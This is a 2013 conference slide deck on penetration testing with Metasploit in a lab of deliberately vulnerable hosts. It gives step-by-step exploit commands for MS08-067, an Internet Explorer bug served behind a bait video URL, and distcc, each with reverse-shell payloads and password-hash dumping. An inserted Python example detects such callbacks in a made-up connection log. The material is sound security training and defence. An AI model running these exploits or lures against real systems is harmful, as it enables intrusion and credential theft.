
iCrOSS 2013_Pentest

Information Security Trainer
Jul. 14, 2013

  1. PENETRATION TESTING AND METASPLOIT BASIC. Presented by Syarif! Indonesia Creative Open Source Software ( ICrOSS ) 2013, Jakarta, April 25 2013, Balai Kartini
  2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)
  3. Whoami • Just me, myself: http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecturer & Assistant Manager • CyberCrime Investigator
  4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1) • Penetration testing is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  5. What’s Penetration Testing • A method to evaluate the security of a computer system / network • Practice ( attacking ) an IT system like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanisms • Compromise an organization’s IT system security. Must have permission from the IT system owner! Illegal activity puts you in jail
  6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  7. Pentest Phases • Information Gathering • Vulnerability Analysis • Exploitation • Post Exploitation • Reporting
  8. << back|track overview • The most advanced Linux security distribution • Open source & always being developed for security professionals • Real-world pentesting tools
  9. << back|track overview • Watch the Video! :)
  10. << back|track overview
  11. << back|track overview
  12. What’s Metasploit • Not just a tool, but an entire framework *1) • An open source platform for writing security tools and exploits *2) • Easily build attack vectors by adding its exploits, payloads and encoders • Create and execute more advanced attacks • Ruby based
  13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  14. MSFconsole
  15. MSFcli
  16. Metasploit Terminology • Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1) • Payload : code that we want the target system to execute ( a few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as the payload when exploitation occurs *1) • Module : a piece of software that can be used by Metasploit *1) • Listener : a component that waits for an incoming connection *1)
  17. How does exploitation work ( diagram ) • 1 : attacker sends exploit + payload to the vulnerable server • 2 : exploit runs, then payload runs • 3 : upload / download data
  18. Traditional Pentest Vs Metasploit • Traditional Pentest : Public Exploit Gathering → Change offsets → Replace ShellCode → Execute • Metasploit for Pentest : Load Metasploit → Choose the target OS → Use exploit → SET Payload → Execute
  19. Meterpreter • Used as a payload after a vulnerability is exploited *1) • Improves post exploitation
  20. Meterpreter ( diagram ) • Exploiting a vulnerability → Select meterpreter as the payload → meterpreter shell
  21. Meterpreter command
  22. Meterpreter command
  23. Meterpreter command
  24. Meterpreter command
  25. Meterpreter command
  26. Pentest Scenario ( diagram ) • attacker → vulnerable OS on VMware * ( * : Ubuntu 8.04 Metasploitable )
  27. Pentest Scenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
  28. OS in the Lab • BackTrack 5 R3 • IP address : 172.16.150.169 • Windows XP SP2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171
  29. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • msf exploit(ms08_067_netapi) > sessions -l
  30. Windows XP Post Exploitation • msf > sessions -i 1 • meterpreter > getsystem -h • meterpreter > getuid • meterpreter > hashdump
  31. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • msf exploit(ms08_067_netapi) > sessions -l
  32. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit. Just wait until the victim opens the URL http://172.16.150.169:80/miyabi-hot.avi
  33. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  34. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit
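The exploit-then-callback flow of slide 17 is what every lab scenario on slides 29 to 34 produces on the wire: first a connection that delivers the exploit (the attacker hitting the target's SMB service, or the Windows 7 victim fetching the lure page on SRVPORT 80), then the reverse payload connecting back from the victim to LHOST. The detection below is an added example, not from the slides, that correlates those two steps over a constructed connection log built from the slide 28 lab addresses; the log format, the 60-second window and the distcc port 3632 used in the test are assumptions.

```python
from datetime import datetime, timedelta

# Constructed connection log (not from the slides): "timestamp src_ip src_port dst_ip dst_port",
# using the lab addresses from slide 28 (attacker .169, XP .165, Win7 .170, Metasploitable .171).
SAMPLE_LOG = """\
2013-04-25T10:00:01 172.16.150.169 51234 172.16.150.165 445
2013-04-25T10:00:03 172.16.150.165 1045 172.16.150.169 4444
2013-04-25T10:05:10 172.16.150.170 1099 172.16.150.169 80
2013-04-25T10:05:12 172.16.150.170 1100 172.16.150.169 443
2013-04-25T10:30:00 172.16.150.165 1050 172.16.150.167 445
2013-04-25T10:59:58 172.16.150.169 40000 172.16.150.171 3632
2013-04-25T11:00:00 172.16.150.171 33000 172.16.150.169 4444
"""

# Ports the attacker connects TO on the victim (MS08-067 over SMB) and ports the victim is
# lured into connecting OUT on (the ms11_003 web page served on SRVPORT 80).
SERVICE_PORTS = {445}
LURE_PORTS = {80}
WINDOW = timedelta(seconds=60)   # assumed correlation window


def parse(line):
    """Split one constructed log line into (timestamp, src, sport, dst, dport)."""
    ts, src, sport, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, int(sport), dst, int(dport)


def find_callbacks(log_text, service_ports=SERVICE_PORTS, lure_ports=LURE_PORTS, window=WINDOW):
    """Return (victim, attacker, port) for every connection a host opens back to a peer that,
    within `window`, reached it over a service port or served it a lure page."""
    events = sorted((parse(l) for l in log_text.splitlines() if l.strip()), key=lambda e: e[0])
    delivered = {}   # (victim, attacker) -> time of the most recent delivery contact
    hits = []
    for ts, src, _sport, dst, dport in events:
        if dport in service_ports:        # attacker -> victim service (exploit delivery)
            delivered[(dst, src)] = ts
        elif dport in lure_ports:         # victim -> attacker web lure (exploit delivery)
            delivered[(src, dst)] = ts
        elif (src, dst) in delivered and ts - delivered[(src, dst)] <= window:
            hits.append((src, dst, dport))  # victim calling back to the same peer: payload
    return hits
```

With the default sets only the SMB and browser cases are flagged; passing service_ports={445, 3632} also catches the distcc scenario on slide 34, which shows that the port lists, not the correlation logic, decide coverage.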
  35. Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
  36. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  37. References • 1. Metasploit: The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
  38. Challenge in 45 minutes :) • Connect your Windows OS to the TP-LINK access point over DHCP • BackTrack 5 R3 VMware setting : • Network adapter : Bridge • Get 4 pictures by yourself & shut down the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack
  39. Challenge in 45 minutes :)